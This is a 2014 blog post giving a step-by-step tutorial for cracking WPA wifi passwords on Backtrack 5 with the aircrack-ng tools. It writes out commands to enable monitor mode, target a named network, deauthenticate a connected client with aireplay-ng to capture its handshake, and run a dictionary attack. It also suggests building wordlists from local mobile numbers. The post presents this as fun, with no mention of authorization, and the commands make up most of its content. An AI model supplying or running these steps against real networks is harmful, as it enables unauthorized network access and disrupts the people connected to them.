Popular Posts

Friday, 5 September 2014

Wifi Hacking Tutorial with Backtrack

Hacking is an art, a skill and today we'll be talking about how to hack a wifi password!

Things you require :
- Backtrack 5 OS
- A Computer with Wifi & DVD drive
- codes
- & Your Brain!

To start off, download the Backtrack OS here via torrent BT5R3 32bit , BT5R3 64bit and burn it in a blank cd via this software Imgburn. (any doubts about how to do that, Google it or ask)

Then insert that cd in your PC & reboot it, it may start directly via the DVD or if it doesn't, then while your pc starts Press the Function key to go into the boot menu option (F8 for my intel motherboard, it's different for others) the select the DVD drive as boot device, then enter.
click to zoom
The above screen will appear, Wait for 30 secs and it'll start via the live DVD, at the end type "startx" then press enter when your reach the stage as given in the pic below.
click to zoom
Next step is to open the console, which is found on the top toolbar.

Step 1 : type "airmon-ng" & press enter.
(this will detect your wifi card)

Step 2 : type "airmon-ng start wlan0"
(this starts the monitor mode)

Step 3 : type "airodump-ng --encrypt wpa mon0"
(this scans the wifi networks available)


press ctrl+C to stop the scan,
Now select the wifi network you need to hack, I'll be hacking nerdsmasher! here.

Step 4 : type "airodump-ng -w nerdsmasher! --encrypt wpa -c 1 --bssid AA:BE:19:63:B9:20 mon0"
(this will target only the required network)

In this stage, you compulsory need a host connected to the network, unless it won't work and you'll have to try that again later, evenings works good.

When you get a host connected, keep the window as it is & open a new terminal and type there..
Step 5 : "aireplay-ng -0 0 -a AA:BE:19:63:B9:20 -c CC:C3:EA:75:CB:78 mon0"

Now wait till you get a handshake on the first window as shown below.

The hacking part is done, so close both the windows, and let's crack the password now.

Open up a new terminal.

Type "aircrack-ng -w (drag the wordlist here) (drag the crack file here)" then press enter

root folder , .cap file

Now wait for the password.
....
And boom!

Note :
Backtrack has 2 wordlists already inbuilt in
File manager > pentest > passwords > wordlists,
you can use those, or download a huge wordlist from the internet, you'll find that easily.
You can also create a wordlist with local mobile numbers as mostly people keep their mobile numbers as their wifi passwords, I have created such wordlists with mobile numbers of Maharashtra & Mumbai circle, as you might see in the above pics.
Use the internet tools to create such mobile directories.

Have fun!

If you have any doubts please feel free to message us on our Facebook Page Here , and make sure that you like it too!


No comments:

Post a Comment